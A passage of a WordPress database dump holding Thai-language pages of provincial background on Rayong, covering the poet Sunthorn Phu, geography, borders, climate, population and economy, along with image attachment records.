ในสมัยกรุงรัตนโกสินทร์ ตั้งแต่รัชกาลที่ 1 ถึงรัชกาลที่ 4 ได้สร้างผลงานไว้มากมาย สร้างความรุ่งเรืองให้แก่ วรรณกรรมของไทย ต่อมาองค์การศึกษาวิทยาศาสตร์และวัฒนธรรมแห่งสหประชาชาติ ได้ประกาศยกย่องสุนทรภู่ ให้เป็นกวีเอกของโลกสุนทรภู่มีบิดาเป็นชาวกร่ำ เมืองแกลง ซึงในปัจจุบันคือตำบลกร่ำ อำเภอแกลง จังหวัดระยอง จึงถือได้ว่าสุนทรภู่ เป็นชาวระยอง เกิดเมื่อวันที่ 26 มิถุยายน 2329 ณ บริเวณฝั่งธนบุรี ใกล้กับพระราชวังหลัง ในสมัยรัชกาลที่ 1 หลังสร้างกรุงเทพฯ แล้ว 4 ปี สำหรับมารดานั้นยังไม่ปรากฎหลักฐานแน่ชัดว่าเป็นชาวเมือง ใด<strong>\"นิราศเมืองแกลง\" </strong>เป็นนิราศเรื่องแรกที่สุนทรภู่แต่งขึ้นในคราวที่เดินทางไปหาบิดา ที่เมืองแกลง ปี พ.ศ.2349 ซึ่งบิดาได้บวชเป็นพระภิกษุอยู่ที่วัดบ้านกร่ำ เมื่อคราวตามเสด็จพระองค์เจ้าปฐมวงศ์พระราชโอรสพระองค์เล็กในสมเด็จกรมพระราชวังหลัง (สมเด็จเจ้าฟ้ากรมหลวงอนุรักษ์เทเวศร์)ไปพระพุทธบาทสุนทรภู่ได้แต่ง <strong>\"นิราศพระบาท\"</strong> ขึ้นในปี พ.ศ.2350 ขณะอายุได้ 21 ปี สุนทรภู่ได้แต่งงานกับ \"จัน\" มีลูกชาย 1 คนชื่อ \"หนูพัด\" แต่อยู่กันได้ไม่นานต้องเลิกลากันไป เพราะสุนทรภู่เป็นสิงห์ขี้เมา ต่อมาได้ภรรยาอีกคนเป็นชาวสวนบางกรวยชื่อ \"นิ่ม\" มีลูกชายด้วยกัน 1 คน ชื่อ \"ตาบ\" แต่นิ่มได้ป่วยและเสียชีวิตเมื่อลูกยังเล็ก ๆ กลอนนิทานเรื่องแรกที่สุนทรภู่แต่งคือเรื่อง <strong>\"โคบุตร\"</strong> ความยาว 28 เล่มสมุดไทย แต่งถวายพระองค์เจ้าปฐมวงค์ ซึ่งได้รับความนิยมมาก ครั้นปี พ.ศ. 2358 สุนทรภู่ได้แต่งนิทานคำกลอนขึ้นอีกเรื่องหนึ่งคือ <strong>\"พระอภัยมณี\"</strong>ความยาวประมาณ 94 เล่มสมุดไทยซึ่งคณะละครของนายบุญยังนำไปแสดงทำให้ชื่อเสียงของสุนทรภู่เลื่องลือ ไปทั่วกรุงเทพฯ และหัวเมืองใกล้เคียงสุนทรภู่มีชีวิตรุ่งเรืองมากในสมัยพระบาทสมเด็จพระพุทธเลิศหล้านภาลัย(รัชกาลที่ 2) ซึ่งทรงโปรดปรานบทกวีมาก ครั้งหนึ่งสุนทรภู่ได้แต่งต่อ\r\nบทกวีนิพนธ์เรื่อง <strong>\"รามเกียรติ์\" </strong>ตอนนางสีดาผูกคอตาย ปรากฎว่าเป็นที่พอพระทัยของพระบาทสมเด็จพระพุทธเลิศหล้านภาลัย เป็นอย่างยิ่ง และทรงโปรดแต่งตั้งให้เป็นขุนสมุทรโวหาร เป็นกวีที่ปรึกษา ต่อมาสุนทรภู่ได้แต่งสุภาษิตคำกลอนเรื่อง <strong>\"สวัสดิรักษา\" </strong>มีความยาว 1 เล่มสมุดไทย ใน พ.ศ.2367 ถวายพระเจ้าลูกยาเธอเจ้าฟ้าอาภรณ์ พระโอรสในรัชกาลที่ 2 ครั้นสมัยรัชกาลที่ 3 สุนทรภู่ได้ถูกทอดออกจากตำแหน่งขุนสุนทรโวหาร สุนทรภู่จึงออกบวช ในปี พ.ศ.2367 ณ วัดระฆังโฆสิตาราม แต่มาจำพรรษา ณ วัดราชบูรณะ(วัดเลียบ) ในขณะที่บวชได้แต่ง <strong>\"นิราศภูเขาทอง\" </strong>สำหรับนิทานคำกลอนที่สุนทรภู่แต่งค้างไว้ในสมัยรัชกาลที่ 2 นั้น ได้นำออกมาแต่งต่อ ได้แก่ เรื่อง <strong>\"สิงหไกรภพ\"</strong> และเรื่อง <strong>\"ลักษณวงศ์\"</strong> เป็นต้น ครั้นรัชสมัยพระบาทสมเด็จพระจอมเกล้าเจ้าอยู่หัว(รัชกาลที่ 4) สุนทรภู่ได้กลับเข้ารับราชการอีกครั้งมีบรรดาศักดิ์เป็น \"พระสุนทรโวหาร\" รับราชการอยู่เพียง 4 ปีเศษ ก็ถึงแก่อนิจกรรม เมื่อปี พ.ศ. 2398 อายุ 69 ปี <strong>จังหวัดระยอง</strong> ได้จัดสร้างอนุเสาวรีย์สุนทรภู่ไว้ที่ ตำบลกร่ำ อำเภอเมืองแกลง จังหวัดระยองและได้จัดงาน <strong>\"วันสุนทรภู่\" </strong>ขึ้นเป็นประจำทุกวันที่ 26 มิถุนายนของทุกปี เพื่อรำลึกถึงท่านสุนทรภู่กวีเอกของโล<span lang=\"th\">ก</span></h4>\r\n</div>\r\n<h2><span style=\"color: #000000;\"><strong><span class=\"important-title-blue\">ลักษณะภูมิประเทศ</span></strong></span></h2>\r\n<h4>ภูมิประเทศ เป็นที่ราบชายฝั่งที่เกิดจากการทับถมของตะกอนบริเวณแอ่งลุ่มน้ำระยอง และที่ลาดสลับเนินเขาและภูเขา มีลักษณะเป็นลอนลูกคลื่นสูงต่ำสลับกันไป โดยมีพื้นที่ ทิวเขา 2 แนว คือทิวเขาชะเมาทาง ทิศตะวันออก ซึ่งสูงจากระดับน้ำทะเล 1,035 เมตร และทิวเขาที่อยู่ประมาณกึ่งกลางของตัวจังหวัดเป็นแนวยาวจากอำเภอเมืองระยองขึ้นไปทางเหนือจนสุดเขตจังหวัด มีแม่น้ำสายสั้นๆ ซึ่งเกิดจากเทือกเขาจันทบุรีและเทือกเขาบรรทัด ไหลลงสู่อ่าวไทย แม่น้ำที่สำคัญ ได้แก่แม่น้ำบางประกง แม่น้ำจันทบุรี แม่น้ำระยอง เป็นต้น ลักษณะชายฝั่งทะเลมีหาดทรายสวยงามและมีเกาะใหญ่น้อยเรียงรายเลียบตามแนวชายฝั่งนับเป็นทรัพยากรการท่องเที่ยวที่สำคัญของประเทศ</h4>\r\n<h2><span style=\"color: #000000;\"><b>ที่ตั้งและอาณาเขต</b></span></h2>\r\n<h4>จังหวัดระยองตั้งอยู่ทิศตะวันออกของประเทศไทย ระหว่างเส้นรุ้งที่ 12-13 องศาเหนือ และเส้นแวงที่ 101-102 องศาตะวันออก มีพื้นที่ประมาณ 3,552 ตารางกิโลเมตร หรือประมาณ2,220,000 ไร่ อยู่ห่างจากกรุงเทพฯ ไปทางทิศตะวันออกประมาณ 179 กิโลเมตร</h4>\r\n<h4 style=\"text-align: left;\"><strong> ทิศเหนือ</strong> ติดต่อเขตอำเภอหนองใหญ่ อำเภอบ่อทอง อำเภอศรีราชา จังหวัดชลบุรี</h4>\r\n<h4 style=\"text-align: left;\"><strong> ทิศใต้</strong> ติดชายฝั่งอ่าวไทย ยาวประมาณ 100 กิโลเมตร</h4>\r\n<h4 style=\"text-align: left;\"><strong> ทิศตะวันออก</strong> ติดต่อเขตอำเภอนายายอาม อำเภอแก่งหางแมว จังหวัดจันทบุรี</h4>\r\n<h4 style=\"text-align: left;\"><strong> ทิศตะวันตก </strong>ติดต่อเขตอำเภอสัตหีบ อำเภอบางละมุง จังหวัดชลบุรี</h4>\r\n<strong><span style=\"color: #0000ff;\"><a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a></span></strong>\r\n<h2><span style=\"color: #000000;\"><b>ที่ลักษณะภูมิอากาศ</b></span></h2>\r\n<h4>จังหวัดระยองมีลักษณะภูมิอากาศ แบบมรสุมเขตร้อน ลมทะเลพัดผ่านตลอดปี อากาศอบอุ่นไม่ร้อนจัด บริเวณชายฝั่งทะเลเย็นสบาย ในฤดูฝนจะมีฝนตกชุกระหว่างเดือนพฤษภาคมถึงตุลาคมของทุกปี สามารถเก็บน้ำไว้ในอ่างเก็บน้ำเพียงพอสำหรับการใช้อุปโภคบริโภคและอุตสาหกรรมได้ตลอดทั้งปี</h4>\r\n<h2><span style=\"color: #000000;\"><strong><span class=\"important-title-blue\">การปกครองและประชากร</span></strong></span></h2>\r\n<h4>แบ่งเขตการปกครองเป็น 8 อำเภอ โดยประกอบด้วย 54 ตำบล 439 หมู่บ้าน 80 ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด 1 แห่ง เทศบาลนคร 1 แห่งเทศบาลเมือง 2 แห่ง เทศบาลตำบล 22 แห่ง และองค์การบริหารส่วนตำบล 42 แห่ง ประชากรของจังหวัดระยอง ณ วันที่ 31 ธันวาคม 2550 มีทั้งสิ้น 583,470 คน เป็นชาย 288,098คน คิดเป็นร้อยละ49.38 เป็นหญิง 295,372 คน คิดเป็นร้อยละ 50.62 ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน 224,850 คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน 22,915 คน จำนวนครัวเรือนทั้งจังหวัดรวม 281,344 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ 437 คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง224 คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอปลวกแดง และอำเภอวังจันทร์ 63 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น 638,017 คนในปี 2560 แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า 300,000 คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</h4>\r\n</div>\r\n</div>\r\n</div>\r\n<h3><span style=\"color: #ff00ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n<h4 class=\"contentheading\"></h4>\r\n \r\n\r\n \r\n<h4></h4>\r\n<h2><span style=\"color: #0000ff;\"><a id=\"active_menu\" class=\"mainlevel\" style=\"color: #0000ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_weblinks&view=category&id=44&Itemid=133\">เว็บที่เกี่ยวข้องอื่นๆ</a></span></h2>\r\n<h2><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=category&layout=blog&id=83&Itemid=184\">เอกสารบริการประชาชน</a></span></h2>\r\n<h2 class=\"componentheading\"><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=category&id=87&Itemid=195\">คู่มือบริการประชาชน</a></span></h2>\r\n<h2><span style=\"color: #0000ff;\"><a id=\"active_menu\" class=\"mainlevel\" style=\"color: #0000ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=category&layout=blog&id=41&Itemid=34\">ข้อมูลท่องเที่ยว</a></span></h2>\r\n<h2 class=\"contentheading\"><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/วิสัยทัศน์และยุทธศาสตร-3\">วิสัยทัศน์และยุทธศาสตร์จังหวัดระยอง</a></span></h2>\r\n<h2><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/รายงานสถิติจังหวัด\">รายงานสถิติจังหวัด</a></span></h2>\r\n<div class=\"article-rel-wrapper\">\r\n<div class=\"article-rel-wrapper\"></div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9e%e0%b8%b7%e0%b9%89%e0%b8%99%e0%b8%90%e0%b8%b2%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%87%e0%b8%ab%e0%b8%a7%e0%b8%b1%e0%b8%94', '', '', '2021-11-08 11:33:50', '2021-11-08 04:33:50', '', 0, 'http://www.technicrayong.ac.th/?page_id=821', 0, 'page', '', 0),
(822, 3, '2018-01-29 14:52:48', '2018-01-29 07:52:48', '', 'GPP55', '', 'inherit', 'closed', 'closed', '', 'gpp55', '', '', '2018-01-29 14:52:48', '2018-01-29 07:52:48', '', 821, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/GPP55.jpg', 0, 'attachment', 'image/jpeg', 0),
(826, 3, '2018-01-29 15:05:26', '2018-01-29 08:05:26', '', '29-1-2561 15-06-39', '', 'inherit', 'closed', 'closed', '', '29-1-2561-15-06-39', '', '', '2018-01-29 15:05:26', '2018-01-29 08:05:26', '', 821, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg', 0, 'attachment', 'image/jpeg', 0),
(827, 3, '2018-01-29 15:08:36', '2018-01-29 08:08:36', '', '29-1-2561 15-09-24', '', 'inherit', 'closed', 'closed', '', '29-1-2561-15-09-24', '', '', '2018-01-29 15:08:36', '2018-01-29 08:08:36', '', 821, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg', 0, 'attachment', 'image/jpeg', 0),
(828, 3, '2018-01-29 15:12:30', '2018-01-29 08:12:30', '<img class=\"wp-image-825 alignleft\" src=\"/wp-content/uploads/2018/01/GPP55-3-300x190.jpg\" alt=\"\" width=\"818\" height=\"518\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h3></h3>\r\n<strong> </strong>\r\n\r\n \r\n\r\n<strong><span style=\"color: #0000ff;\"> ระยอง..... เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศไทย ที่เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้ต่อหัวประชากรสูง เป็นอันดับหนึ่งของประเทศ </span></strong>\r\n\r\n<span style=\"color: #0000ff;\"><strong> เมื่อก่อนจังหวัดระยองจะเป็นที่รู้จักในฐานะเมืองแห่งผลไม้ดีของภาคตะวันออก ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้ง อาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากความเหมาะสมของสภาพดินฟ้าอากาศที่เอื้ออำนวยและสภาพภูมิประเทศที่เหมาะสม นอกจากนั้น ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม เนื่องจากมีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดก็เป็นที่รู้จักแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทยและชาวต่างประเทศ ฐานเศรษฐกิจที่สำคัญของจังหวัดคือเกษตรกรรม การท่องเที่ยว และอุตสาหกรรม</strong></span>\r\n\r\n<img class=\"wp-image-826 aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39-300x272.jpg\" alt=\"\" width=\"796\" height=\"722\" />\r\n\r\n<img class=\"wp-image-827 aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24-300x126.jpg\" alt=\"\" width=\"731\" height=\"307\" />\r\n\r\n<strong><span style=\"color: #0000ff;\"> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงไปเป็นจังหวัดอุตสาหกรรม นับตั้งแต่การค้นพบก๊าซธรรมชาติในอ่าวไทย เมื่อปี พ.ศ. 2520 เป็นการเริ่มต้นยุค “โชติช่วงชัชวาลย์” และเป็นที่มาของ “โครงการพัฒนาพื้นที่ชายฝั่งทะเลตะวันออก” (Eastern Seaboard Development Program) ในปี 2524 </span></strong>\r\n\r\n<strong><span style=\"color: #0000ff;\"> ในช่วงระยะเวลากว่า 20 ปีที่ผ่านมานั้น ได้ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยอง เปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและการเกษตร ปัจจุบันรายได้เฉลี่ยต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1,143,740 บาท/คน ผลิตภัณฑ์มวลรวมจังหวัด (GPP) เท่ากับ 672,104 ล้านบาท โดยมาจาก สาขาการผลิตด้านอุตสาหกรรม กว่าร้อยละ 92</span></strong>\r\n\r\n<span style=\"color: #0000ff;\"><strong> จังหวัดระยองได้นำข้อมูลด้านต่าง ๆ ทั้งด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์อื่น ๆ มาเรียบเรียงลงในหนังสือเล่มนี้ เพื่อให้ผู้ที่ได้อ่านหนังสือเล่มนี้จะได้รู้จักจังหวัดระยองมากขึ้น และหวังเป็นอย่างยิ่งว่าจะเป็นสื่อที่ช่วยส่งเสริม เผยแพร่และประชาสัมพันธ์จังหวัดระยอง ให้เป็นที่รู้จักกว้างขวางยิ่งขึ้น หากมีข้อบกพร่องประการใด คณะผู้จัดทำยินดีน้อมรับเพื่อนำไปปรับปรุงแก้ไขในโอกาสต่อไป </strong> </span>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-01-29 15:12:30', '2018-01-29 08:12:30', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(830, 3, '2018-01-29 15:43:32', '2018-01-29 08:43:32', '', '29-1-2561 15-44-46', '', 'inherit', 'closed', 'closed', '', '29-1-2561-15-44-46', '', '', '2018-01-29 15:43:32', '2018-01-29 08:43:32', '', 821, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg', 0, 'attachment', 'image/jpeg', 0),
(831, 3, '2018-01-29 15:59:05', '2018-01-29 08:59:05', '', '29-1-2561 15-58-38', '', 'inherit', 'closed', 'closed', '', '29-1-2561-15-58-38', '', '', '2018-01-29 15:59:05', '2018-01-29 08:59:05', '', 821, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg', 0, 'attachment', 'image/jpeg', 0),
(832, 3, '2018-01-29 15:59:07', '2018-01-29 08:59:07', '', '29-1-2561 15-58-49', '', 'inherit', 'closed', 'closed', '', '29-1-2561-15-58-49', '', '', '2018-01-29 15:59:07', '2018-01-29 08:59:07', '', 821, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg', 0, 'attachment', 'image/jpeg', 0),
(833, 3, '2018-01-29 15:59:09', '2018-01-29 08:59:09', '', '29-1-2561 15-59-16', '', 'inherit', 'closed', 'closed', '', '29-1-2561-15-59-16', '', '', '2018-01-29 15:59:09', '2018-01-29 08:59:09', '', 821, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg', 0, 'attachment', 'image/jpeg', 0),
(834, 3, '2018-01-29 15:59:11', '2018-01-29 08:59:11', '', '29-1-2561 15-59-28', '', 'inherit', 'closed', 'closed', '', '29-1-2561-15-59-28', '', '', '2018-01-29 15:59:11', '2018-01-29 08:59:11', '', 821, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg', 0, 'attachment', 'image/jpeg', 0),
(835, 3, '2018-01-29 15:59:13', '2018-01-29 08:59:13', '', '29-1-2561 15-59-38', '', 'inherit', 'closed', 'closed', '', '29-1-2561-15-59-38', '', '', '2018-01-29 15:59:13', '2018-01-29 08:59:13', '', 821, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(836, 3, '2018-01-29 16:06:01', '2018-01-29 09:06:01', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"https://sites.google.com/site/rayongshelter/khxmul-thawpi-canghwad-rayxng\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 